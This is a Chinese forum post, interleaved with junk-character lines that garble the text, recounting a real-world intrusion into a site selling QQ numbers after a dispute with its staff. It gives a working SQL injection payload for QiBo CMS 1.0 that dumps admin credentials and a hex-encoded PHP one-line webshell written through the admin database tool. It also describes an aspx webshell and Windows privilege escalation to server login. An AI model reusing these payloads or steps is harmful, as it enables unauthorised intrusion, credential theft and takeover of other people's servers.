|
4 J* N; ?/ u6 n( \, N' \$ |
# W. D. d7 G) N. @' m2 C; _# N" U9 G
) g4 W8 B6 ? s5 F7 ~
) o& s# z8 I3 T2 G+ D 一、踩点寻找漏洞 0 Z1 r& w) P! S" h/ \9 W0 k, M
闲来无事,在各个QQ靓号群求买5位QQ,寻问半天无果就在百度搜索5位QQ扫号找到“目标”www.qq.com,打开一看就一静态页面,哇好多靓号啊,90000000,300000,98888888,199999999,哇这么多靓号,然后我去联系客服,要求客服登录账户看看,此处略去100字,然后开始撕逼,然后就有了下文。。。。
$ X' b8 R7 `9 o% O* o8 h& f+ d随手拿御剑扫了一下好多php页面,随手加一个member发现是齐博1.0的内容管理系统,然后就去百度找漏洞,什么后门漏洞一一做测试都无果,找来找去找到一个全版本的注入漏洞,详细利用方法如下:
- }9 d) }. g/ x/ U# c先注册一个用户,记住注册时候的邮箱以uid号, + J( U! C9 f m% d! `# x* K

' j0 P( n( k+ w9 A 1 h% W; m b+ s( R8 e$ w
然后我们打开火狐浏览器简单构造一下,http://www.qq.com/member/userinfo.php?job=edit&step=2,发送数据包如下: * B9 H1 Z) I/ d
6 H1 U( N( t& htruename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select user()) where uid=3%23
+ \; \0 s6 [3 y; o8 t这里的email和uid一定要和注册的账号所吻合,然后访问,提示成功以后查看用户资料如图:
4 q% |' c/ _! R3 a . Q/ @6 V2 E+ W% ^2 ^+ n
确实存在注入漏洞,那么我们来注入一下管理账号密码,修改数据包如:truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select concat(username,0x2e,password) from qb_members limit 1) where uid=3%23 7 o5 n; F4 ?, R- g. s
 4 j& V& ^! V3 G6 k7 l: L" f
* u" @9 ^- E5 o; @% J5 O
解密进后台如图: 1 R, r y/ f [$ T0 |0 g

* |$ b8 v6 ^( \4 l# T# N* v 4 B, e$ T( ]7 p+ I# M6 [! P
* u% M2 l8 r2 F" }' |* i) {' g$ Q二、后台getwebshell
# V0 l+ j& K2 p( S4 \3 ]- b进了后台,以前齐博有个后台getwebshell漏洞,在系统功能- 单篇文章独立页面管理-增加页面添加个webshell,如图:
& F$ K3 N. w/ ?1 n- s: [- g
+ f. y; I: @ n) q9 ]
/ {3 K" U% R* `5 R( a1 F& ?7 @ # G" Q/ O* V# M: t% p& O- Y+ W- [ w
然后点确定,添加提示
( T/ z6 V8 {# y9 s& u# f ( C7 O/ {+ a. M6 M/ ^) e

) |% Y: w6 R; z: {% \7 o0 P ! y8 H# o, F( N1 I, B
由于是ii6.0的所以我们可以考虑一下解析漏洞,我们再来如图:
1 Y5 V' a( C$ ^ 4 O6 ]9 l/ D, H: F' [
 + I9 l4 U H+ [& {
改静态页面为help.php;.htm,然后我们发现访问help.php;.htm是404(写文章之前测试是可以成功写入的),欧巴,他么的我们再想想别的办法,抽了一支烟,我们继续,他这里不是有个服务器信息、数据库工具吗,之前我们测试当前用户名是root,那么我们完全可以考虑利用服务器信息、数据库工具来导入一句话,屌屌的妈妈的,我们来演示一下,先把一句话hex编码一下,<?php assert($_POST[sb]);?>编码以后是:0x3C3F7068702061737365727428245F504F53545B73625D293B3F3EDA网站目录是D:\wwwroot\qq.com\admin\,注意我们要把\改成/,否则不成功D:/wwwroot/qq.com/admin/,下面我们来导一下 6 b) ^ z" Z; o1 B6 s
如图: 5 D3 ^, X! h" q1 ? a. J

) H# `" d3 k+ a9 I/ I1 C0 S 4 H' ^! n9 C8 g! i) s. |' q
8 m% I5 p7 J, C+ _1 {( W7 j之前已经测试过了用普通菜刀无法连接,测试用过狗菜刀也无法连接,用xiese打开
! |8 z1 }) _& B: U- e - @$ i- ]& G$ S9 t9 G4 f" t1 T
 & l% p+ L& q, I. D
% |6 K# Y- T# p
三、提权进服务器
9 K0 A e# S1 i2 t+ p经测试xise下一句话只有在admin目录下有权限浏览,且不能执行命令,庆幸的是支持aspx,那么我们就上一个aspx大马,然后执行命令提示拒绝访问,哈哈在c:\windows\temp下上传cmd.exe然后执行systeminfo,发现打了400多补丁,如图: 5 p# h0 ~( @! Y i, [2 Y
 . f' _7 W9 E- M- k7 {. U
) f3 W, b* D( B: M$ T4 c# {啧啧啧,这么多补丁,我都没去试试今年和2014年放出来的exp,而且是在咱们大00下载了一个变异pr,然后上传提权如图:
, r/ S/ |7 K( N' w* L , p7 O' H$ L w. ^3 f) o( `- P* x
8 n0 g, P6 e- a9 g5 q然后登陆服务器如图: % Z0 b; J# m! x/ Q$ D9 t
- z) [$ O, F2 Y: B( S$ F# N, n
$ J& q; v) y r
& Z! p' g$ ^$ f' p1 Y1 E
S; K, k" g: t5 a2 _- W& z4 S # J: c+ j8 p" W l
难怪普通刀连接不上,原来是有狗。 4 `- R4 F% ]3 S! C+ H
: B0 P2 V3 {8 K. }+ V ) ]! m0 P0 m* i5 H3 G
4 s$ G9 X" M4 ^! ~; c+ k$ D. u& j
% Q3 v3 U, x; p* E# l$ T. `# q: D1 Y* ^
2 E8 a9 {" O& @5 _# W
|